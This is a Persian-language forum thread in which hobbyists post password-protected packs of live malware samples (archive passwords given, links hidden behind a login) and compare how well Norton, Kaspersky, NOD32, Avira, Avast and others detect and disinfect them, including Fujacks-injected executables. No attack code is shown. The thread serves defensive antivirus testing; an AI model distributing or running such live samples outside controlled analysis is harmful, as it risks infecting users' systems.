به هر حال بهتره تنظیمات این آنتی ویروس در حذف اتوماتیک فایل های آلوده روی Manual گذاشته بشه. :20:

Ava Uk جان من به روشی که شما فرمودید هم عمل کردم و 4 عدد فایل از 30 ویروس موند و نشناخت.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و از 52 ویورس هم همینطور 5 عدد موند
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ولی بقیه ویورسهای پستهای قبل رو که کسپر یا نورتون شناسایی نکرده بودند براحتی شناخت و حذف کرد.
البته نورتون هم توی فایلهای rar یا zip که یک فایله ویروسی هم داشته باشند کله فایل رو حذف میکنه.

Ava Uk جان من به روشی که شما فرمودید هم عمل کردم و 4 عدد فایل از 30 ویروس موند و نشناخت.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و از 52 ویورس هم همینطور 5 عدد موند
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ولی بقیه ویورسهای پستهای قبل رو که کسپر یا نورتون شناسایی نکرده بودند براحتی شناخت و حذف کرد.
البته نورتون هم توی فایلهای rar یا zip که یک فایله ویروسی هم داشته باشند کله فایل رو حذف میکنه.

ممنون عزیز, باز هم نتیجه ها عالی هستند و ناد32 خوب خودشو نشون داده. آنتی ویروسهایی در صفحات قبل داریم که بیشتر از 10 تا رو در هر بسته شناسایی نکردند. :10:

سعی کن فایل های شناسایی نشده رو برای ناد32 ارسال کنی. مخصوصا یک Rootkit خطرناک هست به اسم us_TDSS . البته بقیه هم خطرناکند اما درجه این خیلی بیشتره. :31:

باز هم در این تست ها شرکت کن. اولین ناد32 هست که در تست شرکت میکنه. نمیدونم چرا از آنتی ویروسهای دیگه خبری نیست؟ :25:


البته نورتون هم توی فایلهای rar یا zip که یک فایله ویروسی هم داشته باشند کله فایل رو حذف میکنه.

بله این مسئله در کل زیاد جالب نیست و بهتر بود بود اینطوری نباشه.
یادمون نره هیچ آنتی ویروسی بی عیب نیست و هیچ آنتی ویروسی هم بهترین نیست. :20:

خواهش میکنم امیر جان. آره نتایجش خیلی بهتر از بقیه آنتی ویروسها بود که تو صفحاته قبل بررسی کردم. فایلهای ناشناخته رو براش سابمیت کردم.
البته چون من از ایمیجهای مختلف استفاده میکنم با یک ری استارت میتونم هم از نورتون هم کسپر و هم نو32 استفاده کنم. چون نتایج کسپر و نورتون توی پیامهای قبل وبد ترجیح دادم که نتیجه نود32 رو اعلام کنم.
ما در خدمته همه دوستان عزیز هستیم.
ممنون

البته نورتون هم توی فایلهای rar یا zip که یک فایله ویروسی هم داشته باشند کله فایل رو حذف میکنه.


البته بهتر اینطور بگیم که این اتفاق فقط در مورد فایلهای RAR میفته.

تکراری !!! :43:

البته بهتر اینطور بگیم که این اتفاق فقط در مورد فایلهای RAR میفته.

Batman عزیز یعنی نورتون میتونه وقتی ویروسی کدهای خودشو به فایل های EXE تزریق کرد فقط کدهای آلوده رو از داخل EXE ها پاک بکنه؟

یا اینکه میتونه فقط فایل آلوده را از داخل فایل های فشرده شده ی دیگه مانند Zip, ISO و یا bin پاک کنه و به فایل های سالم کاری نداشته باشه؟

البته درسته که پست شما رو نقل قول کردم اما این صحبت من در مورد همه آنتی ویروسهاست. اگر آنتی ویروسی نتونه یک فایل فشرده شده ساده رو که فقط 1 فایل آلوده توشه از وجود آلودگی پاک کنه, آیا فکر نمیکنید زمانی که سیستم شما به ویروسها و کرمهای خطرناکی آلوده شد خیلی دیر شده باشه و همه فایل های مهمتون رو از دست بدید و در آخر هم با نصب دوباره ویندوز همان آنتی ویروس قبلی را نصب کنید.

توانایی آنتی ویروسها در پاک کردن فایل ها و یا کدهای آلوده از داخل فایل های سالم معمولا Disinfect یا Repair گفته میشه اما بعضی آنتی ویروسها حتی با انجام قرنطینه نیز میتونند همچین کاری را بکنند.

برای اینکه این موضوع روشن بشه من یک تست خیلی ساده و ابتدایی را پیشنهاد میکنم انجام بدید. در این تست کدهای آلوده به فایل های سالم تزریق نشدند و EXE ها سالم هستند, بنابراین بیرون کشیدن 2 فایل آلوده از داخل فایل های سالم باید برای آنتی ویروسها عمل ساده ای باشه.

من 2 فایل با فورمت های Zip و EXE درست کردم. عکس زیر...

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

محتوای داخل هر دو فایلی که در عکس میبینی مشابه است و هیچ فرقی با هم نمیکنند. محتواشون در عکس زیر معلومه...

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دو فایلی که با فلش قرمز مشخص کردم هر دو فایل آلوده هستند و هر دو نیز توسط دیتابیس نورتون شناسایی شدند. بقیه فایل ها شامل عکس و فایل های سیستمی سالم با فورمت های مختلف هستند.

تستی که شما باید انجام بدید...

اول یک کپی از هر دو فایل یعنی هم فایل Zip و هم EXE را جایی کپی کنید تا در صورت بروز اشتباهی دوباره مجبور نشید اونها رو دانلود کنید.

بعد روی فایل Zip و EXE شده کلیک راست کنید و اون رو توسط آنتی ویروستون اسکن کنید. آنتی ویروسها باید قادر باشند که فقط 2 فایل آلوده را از داخلشون پاک کنند و نه فایل های دیگه رو.

اگر افراد دیگه ای با آنتی ویروسی به غیر از نورتون امتحان کردند و یکی از 2 فایل آلوده را آنتی ویرسشون شناسایی نکرد مهم نیست. کافیه که فقط یکی را تشخیص بده و در پاک کردن همان موردی که تشخیص داده موفق باشه نه اینکه کل فایل EXE یا Zip شده را پاک کنه.

بطور مثال Avira Antivir در هیچ کدام از نسخه هاش نمیتونه حتی فایل آلوده داخل Zip را پاک بکنه چه برسه به EXE. نتیجه در عکس زیر معلومه...

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

هر چند که Avira Antivir از لحاظ هوش مصنوعی, دیتابیس, پرفورمنس و کم مصرف کردن منابع سیستم همیشه جزو TOP3 ها قرار میگیره اما من این آنتی ویروس را برای سیستمی که از قبل آلوده شده باشه و بخواهید آلودگی هایی مانند ویروس های Sality, Virut یا Jeefo را باهاش پاک کنید به هیچ وجه پیشنهاد نمیکنم چون قادر به Disinfect کردن فایل های EXE و فایل های دیگه نمیباشد و کل فایل آلوده شده را پاک میکنه.

البته عمل Disinfect کردن را حتی آنتی ویروسهایی که ادعا میکنند قادر به این کار هستند گارانتی نمیکنند و در واقعیت همیشه شاهد این بودیم که بعضی فایل های EXE بعد از Disinfect شدن توسط آنتی ویروس قادر به استفاده شدن نبودند اما با این وجود در اکثر مواقع بعضی آنتی ویروسها موفق بودند و اکثر فایل های سالم را را که به ویروس و یا کرم آلوده شده بودند از آلودگی پاک کردند.

نتیجه ی این تست همه چیز را بخوبی روشن میکنه:46:
موفق باشید.

در داخل فایل rar شده ی زیر هر دو فایل zip و exe قرار دارند. فقط برای فایل rar پسورد گذاشته شده و فایل های zip و exe بدون پسورد میباشند.

دانلود از لینک زیر.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123

نوتون فقط ویروس فایل zip را حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ولی فایل exe را کامل حذف کرد

بسته ی 52 تایی / بزرگترین بسته ی ارسال شده حاوی Malware ها در پی سی ورد.


این بزرگترین بسته ای هست که تا حالا در پی سی ورد معرفی کردم. این بسته شامل 52 فایل آلوده به کرم, تروجان, ویروس, Adware و غیره است. البته من دوست داشتم اکسپلویت ها رو هم در این بسته جا بدم اما چون کار اکسپلویت ها یک چیز دیگه است و بهتره که از اونها بصورت آنلاین تست گرفته بشه اونها رو استفاده نکردم.

فایل های داخل این بسته حداقل 1 ماه قدیمی هستند و آنتی ویروسها باید همه 52 فایل را تشخیص بدند. از این 52 فایل 2 فایل را در موقع اسکن نادیده بگیرید و نتیجه را از 50 تا فایل حساب کنید. این 2 فایل رو به آنتی ویروسها آوانس میدیم اما بیشتر نه. :31:

امیدوارم که طرفداران NOD32, BitDefender, Avast, McAfee, TrendMicro هم در این تست شرکت بکنند چون در تست های قبلی خبری ازشون نبود. :5::10:
بیشترین میزان شناسایی را کدام آنتی ویروس خواهد داشت؟

محتوای این بسته قبلا توسط من یا دوستان دیگه ارسال نشده.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
سلام
Aviraچراپس55تاشناخت؟:18:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینم
یه ویروس نسبتا قدیمی که تا الان
توسط خیلی از انتی ویروس ها شناسایی نمیشه
نتیجه ویروس توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید




دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد:123

عالی ! واقعا بحث های تخصصی میشه خیلی مفید. ممنون از همگی. :)

خب بحث شده disinfection کردن که خیلی عالیه. ما هم همراهی می کنیم :) خب منم نتوستم گندزدایی کنمش.

این بحث disinfection کردن مهمترین نکته برای پاکسازی سیستم آلودست. شخصا من از کسپرسکی برای پاکسازی سیستم های آلوده استفاده میکنم حالا یا نسخه اصلی یا ریموال تولش متاسفانه چند روز پیش روی این مورد دقت نکردم و آویرا پاکسازی کردم یکی از سیستم های آلوده رو بعد از پاکسازی ویندوز اورجینال کاملا از بین رفت با اینکه اول دستور cure کردن رو داده بودم اما آویرا نتوست. حالا داستان های بعدیش بماند.

حالا یکی از دوستان که کسپرسکی داره این فایل رو اسکن کنه ببینیم تا اگه تونست تشویقش کنیم :)



دوستان من بعد از اینکه فایل ها رو اسکن کردم کسپرم قرمز شده و این پیام روش هست و هرچی اون کلمه ای رو که دورش خط کشیدم میزنم عمل نمی کنه و یک دور کامل اسکن کردم اما چیز خاصی نشناخت

ادی جان مشکلت حل شد یا نه ؟ اگه حل نشد بگو کمک کنیم.
این بیشتر به خاطر تداخل وین دیفندر سون و ویستاست. بهتره دیفند رو خاموش کنی اگه سون یا ویستا داری بعد ریست کنی و پاک کنی.
تمام کش مرورگر و یا idm اگه داری رو پاک کن.
اگه مشکل باقی موند ریستور ویندوز رو خاموش کن و دوباره پاک کن. این رو هم بگم این ایراد کسپرسکی پیدا کرده اصلا خطری الان نداره و سیستمت الوده نیست.

مشکلی بود حتما بگو

اینم
یه ویروس نسبتا قدیمی که تا الان
توسط خیلی از انتی ویروس ها شناسایی نمیشه
نتیجه ویروس توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد:123
نورتون از روی اسکن نشناخت

نورتون از روی اسکن نشناخت

از سونار چی؟

اینم معنی سونار: حفاظت از فعالیت‌ها و اطلاعات مالی کاربر در محیط وب

از سونار چی؟
از سونار نتونست رد بشه:31::31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نتیجه ی این تست همه چیز را بخوبی روشن میکنه[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینم از اسکن کسپر :

EXE

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ZIP

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

توضیح : به طور کامل پاک نکرد!!!

:13:

یا اینکه میتونه فقط فایل آلوده را از داخل فایل های فشرده شده ی دیگه مانند Zip, ISO و یا bin پاک کنه و به فایل های سالم کاری نداشته باشه؟
البته درسته که پست شما رو نقل قول کردم اما این صحبت من در مورد همه آنتی ویروسهاست. اگر آنتی ویروسی نتونه یک فایل فشرده شده ساده رو که فقط 1 فایل آلوده توشه از وجود آلودگی پاک کنه, آیا فکر نمیکنید زمانی که سیستم شما به ویروسها و کرمهای خطرناکی آلوده شد خیلی دیر شده باشه و همه فایل های مهمتون رو از دست بدید و در آخر هم با نصب دوباره ویندوز همان آنتی ویروس قبلی را نصب کنید.
عزیز یعنی نورتون میتونه وقتی ویروسی کدهای خودشو به فایل های EXE تزریق کرد فقط
کدهای آلوده رو از داخل EXE ها پاک بکنه؟

خب ava uk جان در تایید بحث های شما در مورد disinfection در مورد rar ها و zip شده های exe . اما به نظر من هم نود32 و هم نورتون می تونه exe های تزریق شده توی exe های سالم رو تمیز کنه. اما بازم اینم حدود داره. ولی غیر ممکن نیست یعنی شاید اون فایل پاکسازی شده با نورتون با کسپرسکی تفاوت داشته باشه.

من این فایل رو آماده کردم تست کنیم.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد : infected

این فایل Exe سالم هست اما fujacks بهش تزریق شده. حالا این یک نمونه واقعی هست و امضای ویروس توی فایل وجود داره اینو تست کنیم هم خوبه

سایز فایل سالم + fujacks تزریق شده = 346/658

من این فایل رو آماده کردم تست کنیم.


سلام

من چند روزه گرفتارم و جا موندم از بحثها و در عین حال سرعت پیشرفت تاپیک هم ماشااله بسیار بالاست ، در پناه خداوند باشید

دکتر جان این مورد رو در حال اسکن شناخت و به در خواست خودم حذف کرد و بعدش اسکن کردم که یکی دیگه رو هم به همچنین .



عشق ، هم آمدنی است و هم آموختنی .

سلام
من چند روزه گرفتارم و جا موندم از بحثها و در عین حال سرعت پیشرفت تاپیک هم ماشااله بسیار بالاست ، در پناه خداوند باشید
دکتر جان این مورد رو در حال اسکن شناخت و به در خواست خودم حذف کرد و بعدش اسکن کردم که یکی دیگه رو هم به همچنین .


منم مثل شما الان اومدم :)... خب پس نتونست ریپیر کنه و فایل اصلی رو نگه داره درسته ؟

خب ava uk جان در تایید بحث های شما در مورد disinfection در مورد rar ها و zip شده های exe . اما به نظر من هم نود32 و هم نورتون می تونه exe های تزریق شده توی exe های سالم رو تمیز کنه. اما بازم اینم حدود داره. ولی غیر ممکن نیست یعنی شاید اون فایل پاکسازی شده با نورتون با کسپرسکی تفاوت داشته باشه.

من این فایل رو آماده کردم تست کنیم.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد : infected

این فایل Exe سالم هست اما fujacks بهش تزریق شده. حالا این یک نمونه واقعی هست و امضای ویروس توی فایل وجود داره اینو تست کنیم هم خوبه

سایز فایل سالم + fujacks تزریق شده = 346/658


مرسی عزیز, بهترین کار رو کردی :10:
من چون نمونه تزریق شده دم دست نداشتم مجبور شدم خودم بسازم . اما این یک نمونه واقعی است و دیگه حرفی برای گفتن باقی نمیمونه و نتیجه ی تست ها نشان دهنده واقعیتی خواهد بود که ممکنه در آینده هر کسی با آنتی ویروسها داشته باشه.

اگر بازم کسی نمونه تزریق شده ی واقعی از کرمهای Jeefo یا Sality داشت بزاره تا تست کنیم. :11:

نتیجه ی تست با AVAST

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Disinfect نتونست بکنه. فقط میتونه اون رو بفرسته به قرنطینه. :31:
Avira هم همینطور. بیچاره از ترسش و حجالتش آب شد رفت تو زمین. فقط قرنطینه میکنه.

خب ava uk جان در تایید بحث های شما در مورد disinfection در مورد rar ها و zip شده های exe . اما به نظر من هم نود32 و هم نورتون می تونه exe های تزریق شده توی exe های سالم رو تمیز کنه. اما بازم اینم حدود داره. ولی غیر ممکن نیست یعنی شاید اون فایل پاکسازی شده با نورتون با کسپرسکی تفاوت داشته باشه.

من این فایل رو آماده کردم تست کنیم.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد : infected

این فایل Exe سالم هست اما fujacks بهش تزریق شده. حالا این یک نمونه واقعی هست و امضای ویروس توی فایل وجود داره اینو تست کنیم هم خوبه

سایز فایل سالم + fujacks تزریق شده = 346/658

ایول نورتون:31::31::31:
وقتی میخواستم ازحالت زیپ خارجش کنم ویروسه فایلو گرفت:31::31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینم فایل که دیگه ویروس نداره
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

خب ava uk جان در تایید بحث های شما در مورد disinfection در مورد rar ها و zip شده های exe . اما به نظر من هم نود32 و هم نورتون می تونه exe های تزریق شده توی exe های سالم رو تمیز کنه. اما بازم اینم حدود داره. ولی غیر ممکن نیست یعنی شاید اون فایل پاکسازی شده با نورتون با کسپرسکی تفاوت داشته باشه.

من این فایل رو آماده کردم تست کنیم.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد : infected

این فایل Exe سالم هست اما fujacks بهش تزریق شده. حالا این یک نمونه واقعی هست و امضای ویروس توی فایل وجود داره اینو تست کنیم هم خوبه

سایز فایل سالم + fujacks تزریق شده = 346/658



kasper pure شناختش .

ایول نورتون:31::31::31:
وقتی میخواستم ازحالت زیپ خارجش کنم ویروسه فایلو گرفت:31::31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینم فایل که دیگه ویروس نداره
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نتیجه ی عالی بود.
دیتابیس و سرعت آپدیت آنتی ویروس و کم اشغال کردن رم و سی پی یو همه یک طرف.
اما...
Disinfection کردن فایل های آلوده به تنهایی یک طرف قضیه است. :46:

راستی غریبه جان. اگر بتونی فایل رو بعد از گدزدایی در virustotal اسکن کنی و نتیجه رو اینجا بزاری ممنون میشم. هر چند که فکر نکنم کد آلوده ای باقی مونده باشه اما بعنوان یک سند لازمه. :46:

فعلا نورتون موفق ترین آنتی ویروس بوده.
کسپرسکی, بیت دفندر و ناد32 و مک آفی هم اگر در تست شرکت کند عالی میشه. :10:
دوستان بخاطر خودتون هم که شده شرکت کنید و نتیجه ها رو با همه تقسیم کنید تا واقعیت مشخص بشه.:11:

---------- Post added at 11:21 AM ---------- Previous post was at 11:20 AM ----------


kasper pure شناختش .

دوست عزیز 2 صفحه قبل رو مرور کن و بخون. بحث بر سر شناختنش نیست . همه آنتی ویروسها میشناسن.
بحث بر سر Disinfection یا گندزدایی کد آلوده ی ویروس از داخل فایل های سالم است. :10:

راستی غریبه جان. اگر بتونی فایل رو بعد از گدزدایی در virustotal اسکن کنی و نتیجه رو اینجا بزاری ممنون میشم
قبل از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبعد از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

قبل از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبعد از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

غریبه جان ممنون.

اما این 2 نتیجه ی اسکن در VirusTotal امضاهای دیجیتالیش با فایلی که من الان دارم یعنی infected.exe یکی نیست.

شما احتمالا وقتی خواستی اسکن بکنی show last report رو زدی. شما باید از اول فایل رو اسکن بکنی و از اسکن هایی که قبلا کس دیگه ای استفاده کرده, استفاده نکنی.

ممنون. :10:

یه خواهش از تمام دوستان (drhaniball عزیز لطفا به پست اول تاپیک اینم اضافه کنید)

لطفا فایلهارو در آدرس :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدآپ کنید ، هم مستقیمه ، هم مشکلی که بعضی از کاربرا با 4shared دارن رو نداره!

ممنون:11:


این فایل Exe سالم هست اما fujacks بهش تزریق شده. حالا این یک نمونه واقعی هستنتیجه بعد از اسکن فایل با کسپر:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یه خواهش از تمام دوستان (drhaniball عزیز لطفا به پست اول تاپیک اینم اضافه کنید)

لطفا فایلهارو در آدرس :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدآپ کنید ، هم مستقیمه ، هم مشکلی که بعضی از کاربرا با 4shared دارن رو نداره!

ممنون:11:


نتیجه بعد از اسکن فایل:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Dreamland عزیز مرسی. :11:
اسم آنتی ویروس رو یادت رفته بنویسی. با چی اسکن کردی؟
این طور که معلومه آنتی ویروس در Disinfection کردن کد آلوده موفق بوده؟ اگر اشتباه میکنم توضیح بده.

ممنون:20:

Ava UK جان مثل همیشه با کسپر 2011

کاملا حق با شماست:11:

سلام

دوستان من هر کار کردم نتونستم یه عکس درست و حسابی از نتیجه کار بزارم اینجا اما یه توضیح میدم و اگه تونستم تا فردا عکس هم

میزارم ، بعد از اسکن درخواست پاک سازی رو دادم که جی دیتا هم انجام داد و بعدش هم اجراش کردم که اجرا شد ، پیام بالای صفحه

این هستش Massege Cracker و یه سری عبارات دیگه که و چند تا کادر خالی و در پایین صفحه هم کلمه abut بصورت بزرگ و آبی رنگ

نوشته شده ، دوستان ما رو ببخشید . قضاوت با اساتید محترم


عشق ، هم آمدنی است و هم آموختنی .

سلام

دوستان من هر کار کردم نتونستم یه عکس درست و حسابی از نتیجه کار بزارم اینجا اما یه توضیح میدم و اگه تونستم تا فردا عکس هم

میزارم ، بعد از اسکن درخواست پاک سازی رو دادم که جی دیتا هم انجام داد و بعدش هم اجراش کردم که اجرا شد ، پیام بالای صفحه

این هستش Massege Cracker و یه سری عبارات دیگه که و چند تا کادر خالی و در پایین صفحه هم کلمه abut بصورت بزرگ و آبی رنگ

نوشته شده ، دوستان ما رو ببخشید . قضاوت با اساتید محترم



مرسی امیر جان که آزمایش کردی :11:

نتیجه با توضیحاتی که دادی مثبت بوده و آنتی ویروس تونسته با استفاده از انجین بیت دفندر کد آلوده رو از توش پاک کنه. چون Avast رو که یکی از انجین های G-Data هست آزمایش کردم نتونست.

اگر G-Data نمیتونست کدهای آلوده رو از توش پاک کنه اصلا فایلی برای شما نمیموند که بخواید اجراش کنید. کل فایل رو میفرستاد به قرنطینه. اما بعد از پاک کردن کد های آلوده شما فایلی اصلی به اسم infected.exe را داشتی که تونستی اجراش بکنی. :20:

پس تا اینجا آنتی ویروسهایی که قادر به Disinfect کردن کدهای آلوده به ویروس در فایل های سالم بودند میشند...

Norton
Kaspersky
G-DATA
BitDefender
Dr.Web Antivirus

اونهایی هم که تا حالا موفق نبودند و فایل سالم را کاملا پاک کردند عبارتند از ...

Avira Antivir
Avast Antivirus

بقیه ی آنتی ویروسها هم اگر شرکت بکنند بهتر میشه و نتیجه کاملی را در این انجمن خواهیم داشت. :10:

ویرایش> دکتر وب هم به لیست بالا اضافه شد.

آنتی ویروس دکتر وب رو آزمایش کردم و براحتی تونست در تست موفق بشه.
بعد از پاک کردن کدهای تزریق شده ی ویروس که با دکتر وب انجام دادم, فایل سالم رو با Avira که اون رو قبلا آلوده تشخیص میداد اسکن کردم فایل سالم گزارش شد. Avast هم فایل رو سالم تشخیص داد.

نتیجه : Dr.WEb کاملا در این تست موفق بود. :31: دکتر وب هم به لیست پست قبلی اضافه شد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

غریبه جان ممنون.

اما این 2 نتیجه ی اسکن در VirusTotal امضاهای دیجیتالیش با فایلی که من الان دارم یعنی infected.exe یکی نیست.

شما احتمالا وقتی خواستی اسکن بکنی show last report رو زدی. شما باید از اول فایل رو اسکن بکنی و از اسکن هایی که قبلا کس دیگه ای استفاده کرده, استفاده نکنی.

ممنون. :10:
بفرمایید
قبل از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبعد از اسکن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نتیجه ی عالی بود.
دیتابیس و سرعت آپدیت آنتی ویروس و کم اشغال کردن رم و سی پی یو همه یک طرف.
اما...
Disinfection کردن فایل های آلوده به تنهایی یک طرف قضیه است. :46:

راستی غریبه جان. اگر بتونی فایل رو بعد از گدزدایی در virustotal اسکن کنی و نتیجه رو اینجا بزاری ممنون میشم. هر چند که فکر نکنم کد آلوده ای باقی مونده باشه اما بعنوان یک سند لازمه. :46:

فعلا نورتون موفق ترین آنتی ویروس بوده.
کسپرسکی, بیت دفندر و ناد32 و مک آفی هم اگر در تست شرکت کند عالی میشه. :10:
دوستان بخاطر خودتون هم که شده شرکت کنید و نتیجه ها رو با همه تقسیم کنید تا واقعیت مشخص بشه.:11:

---------- Post added at 11:21 AM ---------- Previous post was at 11:20 AM ----------



دوست عزیز 2 صفحه قبل رو مرور کن و بخون. بحث بر سر شناختنش نیست . همه آنتی ویروسها میشناسن.
بحث بر سر Disinfection یا گندزدایی کد آلوده ی ویروس از داخل فایل های سالم است. :10:

احسنت به نود 32
نود هم disinfect کرد و فایله ویورسی تزریق شده رو پاک کرد و فایله exe دکتر هانیبال رو نگه داشت.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

احسنت به نود 32
نود هم disinfect کرد و فایله ویورسی تزریق شده رو پاک کرد و فایله exe دکتر هانیبال رو نگه داشت.


ممنون محسن جان:11:

ناد32 هم به لیست اضافه شد.

آنتی ویروسهایی که قادر به Disinfect کردن کدهای آلوده به ویروس در فایل های سالم بودند میشند...

Norton
Kaspersky
G-DATA
BitDefender
Dr.Web Antivirus
Eset Nod32 & Eset Smart Security

اونهایی هم که تا حالا موفق نبودند و فایل سالم را کاملا پاک کردند عبارتند از ...

Avira Antivir
Avast Antivirus

اینم
یه ویروس نسبتا قدیمی که تا الان
توسط خیلی از انتی ویروس ها شناسایی نمیشه
نتیجه ویروس توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید




دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد:123

كسپر در مرحله اسكن فايل مخرب رو شناسايي و حذف كرد.

آنتی ویروسهایی که قادر به Disinfect کردن کدهای آلوده به ویروس در فایل های سالم بودند میشند...
Norton
Kaspersky
G-DATA
BitDefender
Dr.Web Antivirus
Eset Nod32 & Eset Smart Security
اونهایی هم که تا حالا موفق نبودند و فایل سالم را کاملا پاک کردند عبارتند از ...
Avast Antivirus Avira Antivir

خیلی تخصصی و عالی :)

اینم دو تا تروجان جدید
نتیجه توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد123

ویروس های تزریق شده هم فردا یا پسفردا دو سه تا دارم ارسال میکنم
سالیتیaa
و jeefo.

اینم دو تا تروجان جدید
نتیجه توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد123

ویروس های تزریق شده هم فردا یا پسفردا دو سه تا دارم ارسال میکنم
سالیتیaa
و jeefo.

wordship جان آره اگر نمونه های جدیدی که قبلا سالم بودند اما کدهای آلوده بهشون تزریق شده آپلود کنی عالی میشه. :10:
سالیتی و جیفو رو خیلی دوست دارم. کرمهای سمجی هستند :40::31:

در ضمن کسپرسکی این نمونه ای که آپلود کردی را از روی هوش مصنوعی تشخیص میده و به خاطر همین در نتیجه اسکن VirusTotal کسپرسکی نشون داده نمیشه.

wordship جان آره اگر نمونه های جدیدی که قبلا سالم بودند اما کدهای آلوده بهشون تزریق شده آپلود کنی عالی میشه. :10:
سالیتی و جیفو رو خیلی دوست دارم. کرمهای سمجی هستند :40::31:

در ضمن کسپرسکی این نمونه ای که آپلود کردی را از روی هوش مصنوعی تشخیص میده و به خاطر همین در نتیجه اسکن VirusTotal کسپرسکی نشون داده نمیشه.

ممنون
از توجهتون
حتما ولی این سالیتیه خودتون که میدونید 58 کیلو بیشتر نیست
ولی ماله من چسبیده به یه فایل نصب وینمپ شده 4 مگ و خورده ای فردا یا پس فردا حتما اپلودش میکنم

دوستان اگه بازم تست گندزدایی خواستن بکنن اون حجم اون فایل گندزدایی شده و لینک توتالش هم باشه شاید بشه یه نتایجی گرفت. یعنی ببینیم بعد از پاکسازی حجم ها تفاوت داره یا نه. که البته با پروپرتیس این کار انجام بشه که دقیق بشه. اگه وقت شد بکنید ممنون [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نوع مخرب:Backdoor ( احتمالا )

این بکدور احتمالا روی آنتی ویروس کسپرسکی سوار میشه و کارش رو انجام میده. نمیدونم دقیقا کارش چیه اما خیلی مشکوک بود.( یکم هم شک دارم اصلا مخرب نباشه ! :31: )

من ازش یه عکس گرفتم تا دوستان ظاهرش رو هم ببینند. خود کسپرسکی شناسایی نکرده.

ظاهر جالبی داره :)

هم این به احتمال بکدور کسپرسکی و سرور دانلود رو به خاطر دوست عزیزم دریملند گذاشتم :) تا هم نگه لینک مستقیم چرا نذاشتین و هم کسپرسکی شو یه صفایی بده ;)

ظاهرش به شکل فایل نصب می مونه شکل زیر:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدلینک دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد:dr

نوع مخرب:Backdoor ( احتمالا )

این بکدور احتمالا روی آنتی ویروس کسپرسکی سوار میشه و کارش رو انجام میده. نمیدونم دقیقا کارش چیه اما خیلی مشکوک بود.( یکم هم شک دارم اصلا مخرب نباشه ! :31: )

من ازش یه عکس گرفتم تا دوستان ظاهرش رو هم ببینند. خود کسپرسکی شناسایی نکرده.

ظاهر جالبی داره :)

هم این به احتمال بکدور کسپرسکی و سرور دانلود رو به خاطر دوست عزیزم دریملند گذاشتم :) تا هم نگه لینک مستقیم چرا نذاشتین و هم کسپرسکی شو یه صفایی بده ;)

ظاهرش به شکل فایل نصب می مونه شکل زیر:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

توتال:


